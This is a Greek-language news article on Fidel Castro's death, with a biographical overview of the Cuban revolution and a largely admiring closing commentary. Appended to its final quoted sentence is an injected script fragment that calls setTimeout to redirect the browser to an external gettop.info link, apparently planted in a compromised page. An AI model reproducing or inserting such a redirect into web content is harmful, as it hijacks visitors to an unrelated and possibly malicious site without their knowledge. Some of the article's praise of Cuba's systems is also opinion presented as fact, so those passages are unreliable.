Πέθανε ο Φιντέλ Κάστρο σε ηλικία 90 ετών (ΕΙΚΟΝΕΣ)

0
33

 

Ο ηγέτης της κουβανικής επανάστασης, ο Φιντέλ Κάστρο, απεβίωσε το βράδυ της Παρασκευής σε ηλικία 90 ετών, ανακοίνωσε πριν από λίγο ο αδελφός του και πρόεδρος της Κούβας Ραούλ Κάστρο, ο οποίος τον διαδέχθηκε στο αξίωμα το 2006.

«Ο κομαντάντε της κουβανικής επανάστασης απεβίωσε στις 22:29 το βράδυ», είπε ο Ραούλ Κάστρο σε τηλεοπτικό διάγγελμά του το οποίο αναμεταδόθηκε από την δημόσια τηλεόραση.

Ο Φιντέλ Κάστρο θα αποτεφρωθεί σήμερα, Σάββατο, «σύμφωνα με την εκπεφρασμένη βούλησή του», ανέφερε ακόμη ο Ραούλ Κάστρο, που ολοκλήρωσε το διάγγελμά του με τη δράση «Hasta la victoria siempre».

Fidel Castro, Prime Minister of Cuba, smokes a cigar during his meeting with two U.S. senators, the first to visit Castro's Cuba, in Havana, Cuba, Sept. 29, 1974. (AP Photo)

Ο Φιντέλ Κάστρο γεννήθηκε στις 13 Αυγούστου 1926 στο Μπιράν. Από φοιτητής ακόμα αναμείχτηκε στα επαναστατικά κινήματα εναντίον της δικτατορίας του Μπατίστα.

Στην εξέγερση του Σαντιάγο ήταν από τους αρχηγούς στην επίθεση κατά των στρατιωτικών καταυλισμών, συνελήφθη και καταδικάστηκε σε φυλάκιση 15 ετών.

Το 1955 κατέφυγε στις ΗΠΑ από όπου προσπάθησε να μυήσει στην επανάσταση τους εξόριστους Κουβανούς. Εξαιτίας της αντίδραση της αμερικανικής κυβέρνησης, κατέφυγε στο Μεξικό. Από εκεί, με λίγους άνδρες αποβιβάστηκε στην Κούβα, στις 2 Δεκεμβρίου 1956 και ανέβηκε στα βουνά.

Στο Μεξικό όμως έμελλε να συναντήσει, μαζί με τον αδελφό του Ραούλ, έναν γιατρό που έγινε το σύμβολο της επανάστασης, Τον Ερνέστο Τσε Γκεβάρα. Μαζί, οργανώνουν νέο επαναστατικό κίνημα.
castroche

Στις 31 Δεκεμβρίου, ο δικτάτορας Μπατίστα αναγκάζεται να εγκαταλείψει την Κούβα και την Πρωτοχρονιά του 1959, η χώρα μπαίνει σε νέα εποχή, με την επανάσταση να έχει θριαμβευτική κατάληξη. Παρά τους πανηγυρισμούς, ο Κάστρο δίνει οδηγία στους αντάρτες να διατηρηθεί ο έλεγχος, να μην επικρατήσει χάος και να μην ξεσπάσουν βανδαλισμοί, κυρίως στην επαρχία.

Στις 2 Ιανουαρίου 1959 ο θριαμβευτής Φιντέλ εκφωνεί λόγο στο Σαντιάγο και ξεκινά το ταξίδι του προς την Αβάνα. Σε κάθε πόλη και κάθε χωριό, τυγχάνει αποθεωτικής υποδοχής από τους πολίτες. Στις 8 Ιανουαρίου 1959 ο Κάστρο μπαίνει στην Αβάνα όπου τον υποδέχονται εκατοντάδες χιλιάδες Κουβανοί.

fidel_castro

Οι αγώνες του Φιντέλ Κάστρο δεν θα σταματήσουν εκεί. Οι Κουβανοί στέκονται στο πλευρό του και τον στηρίζουν. Όμως οι σύμμαχοί του.. αγνοούνται. Σημαντικό πλήγμα το αμερικανικό εμπάργκο.
«Η επανάσταση είναι σαν το ποδήλατο. Αν σταματήσουμε να κάνουμε πετάλι θα πέσουμε» είχε πει, δίνοντας σε όλους να καταλάβουν ότι δεν θα σταματήσει να μάχεται για το καλό της χώρας του και του λαού του.

fidel1
Το μέλλον της Κούβας, μετά τα δειλά βήματα για την αποκατάσταση της σχέσης με την Αμερική, δεν είναι εύκολο να το προβλέψει κανείς. Το παρελθόν είναι βαρύ, γεμάτο αγώνες, κατακτήσεις και την οικοδόμηση ενός συστήματος υγείας και παιδείας που παρόμοιό του δεν υπάρχει παγκοσμίως. Ο Φιντέλ Κάστρο άλλωστε, όταν ανέλαβε την διακυβέρνηση της χώρας, έθεσε ως προτεραιότητά του την καταπολέμηση του αναλφαβητισμού και την άνθηση της παιδείας. Όπως έλεγε ο ίδιος, το μέλλον θα είναι λαμπρό, αν τα νέα παιδιά μάθουν την ιστορία τους.

Οι απόψεις για τη διακυβέρνησή του και τον τρόπο άσκησης εξουσίας όμως διίστανται. Οι επικριτές του πολλοί. Πολλοί όμως και οι άνθρωποι που τον αγαπούν. Την καλύτερη απάντηση και στους μεν και στους δε έχει δώσει ο ίδιος ο Φιντέλ Κάστρο:
Καταδικάστε με, δεν έχει σημασία. Η ιστορία θα με αθωώσει setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here